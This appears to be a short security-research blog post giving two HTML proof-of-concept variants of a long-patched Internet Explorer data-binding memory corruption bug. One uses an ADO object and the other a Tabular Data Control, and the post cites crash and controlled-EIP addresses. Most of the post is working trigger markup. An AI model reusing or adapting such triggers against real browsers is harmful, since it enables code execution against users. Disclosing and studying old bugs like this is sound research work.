Heap Spray Variations — ADO Object and Tabular Data Control

These are two variations of a heap spray technique, exploring different data-binding sources in place of the original XML island. Both bind an iframe’s src through the datasrc/datafld mechanism, with HTML formatting enabled — the original crash address was 438242f8 CALL ECX+84.

ADO Object Variation

<OBJECT ID="i" DATA="data.html" HEIGHT=0 WIDTH=0></OBJECT>

<span datasrc="#i" datafld="c" dataformatas="html">
<span datasrc="#i" datafld="c" dataformatas="html">

The data.html file contains:

<span id="c"><iframe src="http://www.google.com/"></span>

Tabular Data Control Variation

<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83" ID=i WIDTH=500 HEIGHT=500>
<PARAM NAME=DataURL VALUE="data.csv">
<PARAM NAME=UseHeader VALUE="True">
<PARAM NAME=FieldDelim VALUE=,>
<PARAM NAME=EscapeChar VALUE=\>
<PARAM name=AppendData VALUE=true>
</OBJECT>

<span datasrc="#i" datafld="c" dataformatas="html">
<span datasrc="#i" datafld="c" dataformatas="html">

Both variations replace the original XML island with different data sources while keeping the same binding technique intact. The target EIP was C085FFFE — a recognizable indicator of a controlled-address jump.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE8 DoS — Feeds XML Inside Iframe with Nested Iframe] :: [DoS: Reusing a Cached window.open Reference After Navigation] >